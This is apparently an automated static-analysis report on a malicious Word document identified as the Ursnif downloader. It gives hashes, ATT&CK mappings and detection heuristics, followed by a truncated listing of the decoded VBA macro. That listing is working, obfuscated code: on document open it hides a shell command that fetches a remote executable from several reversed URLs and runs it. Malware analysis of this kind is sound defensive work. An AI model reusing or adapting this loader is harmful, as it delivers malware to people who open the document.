Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 611df394bbb30dea…

MALICIOUS

Office (OLE)

Size: 66.1 KB
Created: 2018-09-10 10:36:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: b252a0b16e0f81a62e9438d845a22202
SHA-1: cca245bac8bb18603e32c667b41d7514bce9c1f8
SHA-256: 611df394bbb30dead4e6bed259e36a03851b6fb1c7fa83b9ce59f59a8a78b56a
Risk Score: 182

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. The ClamAV detection explicitly identifies it as URSNIF, a known downloader family. The script's primary function is to download and execute a second-stage payload, as indicated by the use of Shell() and the nature of URSNIF.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6020 bytes
SHA-256: d2d0698dd984cd98fbca1ab4d930bd2df71b56d1f84a87d8cad859164bc392e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jZcGHmQwbPGUQw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "ZwiPUzhAzBT" + "8105"
   Second "FtHUPHU" + "w"
   Second "103741307" + "9903" + "SN" + "pCicvQpHZjXsc"
   Second "LN" + "lfzWPCUD" + "aa" + "ib"
   Second "wXSMNSlliSvJ" + "4310"
   Second "135" + "I"
   Second "361357105" + "9157"
Shell wqwnz + sFQvT + aHkodXiA, CStr(vbHide)
   Second "1983" + "SjEi" + "108545427" + "pl"
   Second "349329595" + "506905837" + "VP" + "9316"
End Sub



Attribute VB_Name = "iKLOuNFRN"
Function wqwnz()

On _
Error _
Resume _
Next
Second "Qz" + "134892806" + "XkYbIlQ" + "UO"
   Second "597" + "434181702" + "80186505" + "258310909"
wFVvTT = Format(Chr(9 + 4 + 0 + 7 + 79)) + "md " + "/V/" + Format(Chr(6 + 2 + 0 + 5 + 54)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "^" + "s^" + "e" + "t " + "y^s^o=" + "    ^ "
Second "KV" + "lu"
   Second "z" + "URzrD"
   Second "iDk" + "JFDkvIh" + "DvEoQjntvia" + "6118"
   Second "2365" + "u"
GcNNUfCUawQ = "^    ^ " + "^ ^  ^" + " ^ " + "^" + "  }^" + "}{h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "t"
Second "r" + "155583106" + "jVpK" + "SS"
   Second "JZZ" + "DzwJ"
   Second "6852" + "N"
ltjGrKz = "a" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^}" + "^;^ka^" + "erb;^A^" + "k^i^$^" + " " + "^m^" + "etI^-e"
Second "vWM" + "kWPj"
   Second "262290310" + "Vm" + "9965" + "HXzwFi"
   Second "6868" + "199732306"
   Second "FHGR" + "dErG"
   Second "SUS" + "mCV" + "a" + "zROj"
ZTnwEi = "kovn" + "^I;)^A^" + "ki^$^ ^" + ",^hs" + "^o" + "^$(e" + "liF^d^a" + "oln^w^" + "o"
Second "16022491" + "VQXtia" + "441950421" + "FYjT"
   Second "6943" + "hwFzd"
   Second "wY" + "E"
   Second "TWzDrcMjFjsib" + "wMnUOpP" + "tk" + "5193"
QLTmlV = "D^.ztB" + "^${^yr" + "^t" + "{)^E" + "i^U^" + "$ n^i" + "^ ^h^" + "s" + "o^$(^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "a^e"
Second "38777242" + "6917"
   Second "ItWj" + "jaHBaJuAWOkG"
   Second "MiFdPiSuQiIGP" + "GH"
qPRuYjkC = "r" + "^o^f;'" + "ex^e^" + "." + "^'+Ns^" + "l$+'\^'" + "^+"
Second "5680" + "290242265" + "pIl" + "tw"
   Second "DHcsl" + "ilsiHP"
   Second "AHzptY" + "N" + "rR" + "lSVWd"
dwhOzn = Format(Chr(9 + 4 + 0 + 7 + 79)) + "^i^l^b" + "^u^" + "p:vn^" + "e$=A^k^" + "i$^;" + "'0" + "2^3^" + "' =^ N" + "^s^" + "l^$;" + ")'^@^'("
wqwnz = wFVvTT + GcNNUfCUawQ + ltjGrKz + ZTnwEi + QLTmlV + qPRuYjkC + dwhOzn
   Second "tirU" + "Ds" + "1940" + "dD"
   Second "WXPLUPmT" + "BcU" + "vJkz" + "pSp"
End Function
Function sFQvT()

On _
Error _
Resume _
Next
Second "LpTl" + "290794446" + "MZiU" + "KrFW"
   Second "t" + "300692744" + "1594" + "O"
   Second "55027144" + "P" + "351730323" + "519982427"
RGwkaZ = "tilp^" + "S.'^T^e" + "^ydI^" + "tA/^s^" + "u"
Second "HQtOSBInERTAE" + "9362"
   Second "WQJFbY" + "kJ"
wfuDMBuSYjR = "^.ss^en" + "i" + "su^b" + "n^ag^i^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^im//" + ":" + "^ptt^h" + "@^"
Second "GPaUmTQRRawp" + "3362" + "214464197" + "X"
   Second "DrEX" + "uoswk" + "soKz" + "uGiP"
   Second "127366324" + "38" + "UpNUsVtjkIUF" + "vz"
   Second "3172" + "MWPK"
wUXfLuwooP = "l^G^h^" + "YU" + "^6zV" + "/^" + "mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^.^k" + "^ils^ak" + "^d^irg" + "n" + "^i//:" + "^"
Second "z" + "iVwD"
   Second "zSAoYi" + "B"
   Second "483084699" + "O" + "383246444" + "5972"
   Second "3855" + "wqjkmjtZkkkEv"
lcnDizQDHGp = "p^tth" + "^@Q^" + "e^" + "F" + "M^" + "A^xo0" + "65/mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + ".yt^l^" + "a"
Second "c" + "8806"
   Second "fsiMYfpowhV" + "8565"
   Second "tNEa" + "363209860"
BEZrj = "^" + "erem^o" + "^ha" + "^to^s^" + "ara^s//" + "^:^" + "ptth^@" + "^YY^9V" + "g" + "k^9" + "^" + "i^"
Second "wLcjPiXEYUv" + "DUOV" + "1873" + "BroEN"
QCuInBHqfdt = "q/^l^p^" + ".t^a" + "^iw" + "^k" + "^-o" + "ru^e//" + ":^"
Second "Y" + "26
... (truncated)